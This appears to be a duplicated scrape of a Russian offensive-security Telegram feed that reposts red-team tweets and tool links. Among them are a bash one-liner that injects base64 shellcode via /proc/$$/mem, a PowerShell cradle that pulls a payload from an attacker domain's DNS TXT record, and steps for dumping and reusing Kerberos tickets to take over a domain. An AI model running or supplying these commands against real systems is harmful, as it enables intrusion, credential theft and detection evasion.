В преддверии ИБ-мероприятия от «BSS-Безопасность» и Yandex Cloud и после разговоров про реверсы и пывны в грядущем цЭтЭэФе меня пробило на ностальжи, и я вспомнил про мою провалившуюся попытку найти себе применение в этой области.
Для этого 3 года назад, когда деревья были зеленее, я заставил себя написать цикл из четырёх статей для ][ — «В королевстве PWN» — в надежде, что меня увлечет бинарщина, и что я хоть чему-то смогу тут научиться. Будучи особенным ребенком в семье, я провалил как первый, так и второй таск 🤷🏻♂️
Anyways, мб кто-то сможет извлечь пользу из этого цикла — там можно найти вступительные гайды по разным вариациям срыва стека. А я уже все забыл.
Для этого 3 года назад, когда деревья были зеленее, я заставил себя написать цикл из четырёх статей для ][ — «В королевстве PWN» — в надежде, что меня увлечет бинарщина, и что я хоть чему-то смогу тут научиться. Будучи особенным ребенком в семье, я провалил как первый, так и второй таск 🤷🏻♂️
Anyways, мб кто-то сможет извлечь пользу из этого цикла — там можно найти вступительные гайды по разным вариациям срыва стека. А я уже все забыл.
🔥1😁1
😈 [ PortSwiggerRes, PortSwigger Research ]
Using Hackability to uncover a Chrome infoleak by @garethheyes
https://t.co/8gIjJoAio4
🔗 https://portswigger.net/research/using-hackability-to-uncover-a-chrome-infoleak
🐥 [ tweet ]
Using Hackability to uncover a Chrome infoleak by @garethheyes
https://t.co/8gIjJoAio4
🔗 https://portswigger.net/research/using-hackability-to-uncover-a-chrome-infoleak
🐥 [ tweet ]
😈 [ NicolasHeiniger, Nicolas ]
Today I release my first offensive software. Nothing magic, but I needed a tool to search in SharePoint. I took a lot of inspiration from Snaffler (from @mikeloss and @sh3r4_hax). I borrowed some code from PnP-Tools and here is SnaffPoint: https://t.co/cunDSVsE00
🔗 https://github.com/nheiniger/SnaffPoint
🐥 [ tweet ]
Today I release my first offensive software. Nothing magic, but I needed a tool to search in SharePoint. I took a lot of inspiration from Snaffler (from @mikeloss and @sh3r4_hax). I borrowed some code from PnP-Tools and here is SnaffPoint: https://t.co/cunDSVsE00
🔗 https://github.com/nheiniger/SnaffPoint
🐥 [ tweet ]
😈 [ _Wra7h, Christian W ]
I've been accumulating some stuff over the past couple weeks. Here's a few shellcode execution methods I've found digging through Windows APIs and the Google results after page 2. https://t.co/wj3tBW7Esp
🔗 https://github.com/Wra7h/FlavorTown
🐥 [ tweet ]
I've been accumulating some stuff over the past couple weeks. Here's a few shellcode execution methods I've found digging through Windows APIs and the Google results after page 2. https://t.co/wj3tBW7Esp
🔗 https://github.com/Wra7h/FlavorTown
🐥 [ tweet ]
😈 [ nmap, Nmap Project ]
We're delighted to celebrate Nmap's 25th anniversary with (of course) a new release! https://t.co/WRrRvhJzNo
🔗 https://seclists.org/nmap-announce/2022/1
🐥 [ tweet ]
We're delighted to celebrate Nmap's 25th anniversary with (of course) a new release! https://t.co/WRrRvhJzNo
🔗 https://seclists.org/nmap-announce/2022/1
🐥 [ tweet ]
😈 [ HuskyHacksMK, Matt | HuskyHacks ]
Nim shellcode module incoming
@gray_sec lights the way 🚀🚀🚀
🐥 [ tweet ][ quote ]
Nim shellcode module incoming
@gray_sec lights the way 🚀🚀🚀
🐥 [ tweet ][ quote ]
😈 [ ShitSecure, S3cur3Th1sSh1t ]
Searching for DLL Sideloading binaries? A short Powershell Script in combination with Siofra will give you thousands of possible combinations.
https://t.co/0IIjpd5xN0
Either try to replace any Windows DLL Import with your payload DLL or search for Phantom DLLs.
🔗 https://github.com/Cybereason/siofra
🐥 [ tweet ]
Searching for DLL Sideloading binaries? A short Powershell Script in combination with Siofra will give you thousands of possible combinations.
https://t.co/0IIjpd5xN0
Either try to replace any Windows DLL Import with your payload DLL or search for Phantom DLLs.
🔗 https://github.com/Cybereason/siofra
🐥 [ tweet ]
Offensive Xwitter
https://threadreaderapp.com/thread/1563247630129725442.html
Threadreaderapp
Thread by @snovvcrash on Thread Reader App
@snovvcrash: 🧵 (1/3) Some notes on fileless #Masky execution here. Firstly, I shall grab the compiled Masky agent, convert it to a PowerShell noscript and prepare the cradle ⤵️ github.com/penetrarnya-tm… 🧵 (2/3) Now, ...…
😈 [ securityfreax, 🅰🅳🅼 ]
Run your shellcode directly from bash:
dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc
Credits to "unknown"
🐥 [ tweet ]
Run your shellcode directly from bash:
dd of=/proc/$$/mem bs=1 seek=$(($(cut -d" " -f9</proc/$$/syscall))) if=<(base64 -d<<<utz+IUO+aRkSKL+t3uH+McCwqQ8F) conv=notrunc
Credits to "unknown"
🐥 [ tweet ]
This media is not supported in your browser
VIEW IN TELEGRAM
😈 [ FuzzySec, b33f ]
I'm releasing a NuGet package I wrote for @xforcered AdvSim.Cryptography. This NuGet is a simple wrapper which implements sane defaults for a number of Symmetric and Asymmetric cryptographic functions 🔫🥃
GitHub -> https://t.co/wmHKxryWqF
NuGet -> https://t.co/dECi5kB8aE
🔗 https://github.com/xforcered/AdvSim.Cryptography
🔗 https://www.nuget.org/packages/AdvSim.Cryptography/1.0.0
🐥 [ tweet ]
I'm releasing a NuGet package I wrote for @xforcered AdvSim.Cryptography. This NuGet is a simple wrapper which implements sane defaults for a number of Symmetric and Asymmetric cryptographic functions 🔫🥃
GitHub -> https://t.co/wmHKxryWqF
NuGet -> https://t.co/dECi5kB8aE
🔗 https://github.com/xforcered/AdvSim.Cryptography
🔗 https://www.nuget.org/packages/AdvSim.Cryptography/1.0.0
🐥 [ tweet ]
😈 [ mpgn_x64, mpgn ]
"All our admin are in the Protected Users group, we must be secure !"
The actual security 🔽
1⃣ Dump kerberos tickets with lsassy (thanks to @remiescourrou)
2⃣ Convert & Import 🔄
3⃣ CrackMapExec <fqdn> -u user -p '' -k
4⃣ You have 4-hour to compromise the domain 🔥😋
🪂
🐥 [ tweet ]
"All our admin are in the Protected Users group, we must be secure !"
The actual security 🔽
1⃣ Dump kerberos tickets with lsassy (thanks to @remiescourrou)
2⃣ Convert & Import 🔄
3⃣ CrackMapExec <fqdn> -u user -p '' -k
4⃣ You have 4-hour to compromise the domain 🔥😋
🪂
🐥 [ tweet ]
😈 [ Alh4zr3d, Alh4zr3d ]
Sexy tip for your red team ops: avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with your payload at one of your (unburned) domains and do this: "powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
🐥 [ tweet ]
Sexy tip for your red team ops: avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with your payload at one of your (unburned) domains and do this: "powershell . (nslookup -q=txt some.owned.domain.com)[-1]"
🐥 [ tweet ]
😈 [ 0xdea, raptor ]
Simple AS/400 Hacking (via @buherator)
https://t.co/JEcySWimNJ
🔗 https://blog.silentsignal.eu/2022/09/05/simple-ibm-i-as-400-hacking/
🐥 [ tweet ]
Simple AS/400 Hacking (via @buherator)
https://t.co/JEcySWimNJ
🔗 https://blog.silentsignal.eu/2022/09/05/simple-ibm-i-as-400-hacking/
🐥 [ tweet ]
😈 [ daem0nc0re, daem0nc0re ]
Added my CSharp PoC for transacted hollowing.
Interesting technique :)
https://t.co/5Tt4F2mf1g
🔗 https://github.com/daem0nc0re/TangledWinExec/commit/f898bf157ad993f900985d78b8d8fdc22df0163c
🐥 [ tweet ]
Added my CSharp PoC for transacted hollowing.
Interesting technique :)
https://t.co/5Tt4F2mf1g
🔗 https://github.com/daem0nc0re/TangledWinExec/commit/f898bf157ad993f900985d78b8d8fdc22df0163c
🐥 [ tweet ]
😈 [ hackthebox_eu, Hack The Box ]
hey, @TikTokSupport let us introduce you to pentesting real quick
🐥 [ tweet ]
hey, @TikTokSupport let us introduce you to pentesting real quick
🐥 [ tweet ]
хехехе😁2
😈 [ mariuszbit, mgeeky | Mariusz Banach ]
☢️ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210)
1. if doc has MOTW, macros are disabled.
2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled
ISOs are no longer effective containers for MOTW evasion.
However, bundling payloads into LNK is 🔥
🐥 [ tweet ]
☢️ Can confirm: Macros killed in Office 365, 2207 (Build 15427.20210)
1. if doc has MOTW, macros are disabled.
2. if doc is opened from MOTW flagged ISO/IMG, macros are disabled
ISOs are no longer effective containers for MOTW evasion.
However, bundling payloads into LNK is 🔥
🐥 [ tweet ]